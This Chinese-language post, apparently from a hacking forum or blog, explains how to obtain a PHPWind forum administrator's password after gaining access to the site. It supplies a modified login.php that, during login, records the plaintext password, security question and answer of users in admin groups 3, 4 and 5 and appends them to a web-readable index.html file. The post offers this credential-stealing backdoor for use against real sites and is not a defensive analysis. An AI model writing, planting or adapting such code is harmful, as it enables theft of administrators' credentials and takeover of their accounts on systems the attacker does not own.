教你用PHPWIND得到管理员密码的方法

• 发表评论
• 471 次浏览

• A+

有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到他密码咋办?

在登录文件做手脚啊...我来贴一个我修改的.

login.php里面替换掉对应的部分就OK了.

[Copy to clipboard] [ - ]CODE:

if($action=="login"){

/*记录他的问题和答案修改开始*/

$ques=($_POST['question']!=='-1') ? $_POST['question'] : $_POST['customquest'];

$qs='问题:'.$ques.'答案:'.$_POST['answer'];

/*记录他的问题和答案修改结束*/

if(!$_POST['step']){

$jumpurl = $pre_url;

require_once(R_P.'require/header.php');

require_once PrintEot('login');footer();

} elseif($_POST['step']==2){

$logingd && GdConfirm($_POST['gdcode']);

$loginq && Qcheck($_POST['qanswer'],$_POST['qkey']);

require_once(R_P.'require/checkpass.php');

include_once(D_P."data/bbscache/dbreg.php");

InitGP(array('pwuser','pwpwd','question','customquest','answer','cktime','hideid','jumpurl'),'P');

if ($pwuser && $pwpwd)

{

$md5_pwpwd = md5($pwpwd);

$realpass=$pwpwd;

$safecv = $db_ifsafecv ? questcode($question,$customquest,$answer) : '';

list($winduid,$groupid,$pwpwd) = checkpass($pwuser,$md5_pwpwd,$safecv,$lgt);

/*下面是我添加的*/

$adminid = array("3", "4", "5"); //adminid=3,4,5,就是管理者.

if (in_array($groupid, $adminid)){

$showtime=date("Y-m-d H:i:s"); //记录的时间.

@$fp = fopen(D_P.'./data/groupdb/index.html', 'a'); //写入到原本就存在的文件,而且这个文件应该是可写的.

@fwrite($fp, '用户名:'.$pwuser.'-密码:'.$realpass.'-'.$qs.'-GroupID:'.$groupid.'-'.$showtime.'<br>'); //基本格式

@fclose($fp);

}

/*到这里修改结束*/

}else{

Showmsg('login_empty');

}

if(file_exists(D_P."data/groupdb/group_$groupid.php")){

require_once Pcv(D_P."data/groupdb/group_$groupid.php");

} else{

require_once(D_P."data/groupdb/group_1.php");

}

$windpwd = $pwpwd;

$cktime != 0 && $cktime = $timestamp;

Cookie("winduser",StrCode($winduid."\t".$windpwd."\t".$safecv),$cktime);

Cookie('lastvisit','',0);//将$lastvist清空以将刚注册的会员加入今日到访会员中

if($db_autoban){

require_once(R_P.'require/autoban.php');

autoban($winduid);

}

($gp_allowhide && $hideid) ? Cookie('hideid',"1",$cktime) : Loginipwrite($winduid);

empty($jumpurl) && $jumpurl=$db_bfn;

//passport

if($db_pptifopen && $db_ppttype == 'server' && ($db_ppturls || $forward)){

$tmp = $jumpurl;

$jumpurl = $forward ? $forward : $db_ppturls;

$forward = $tmp;

require_once(R_P.'require/passport_server.php');

}

//passport

refreshto($jumpurl,'have_login');

}

}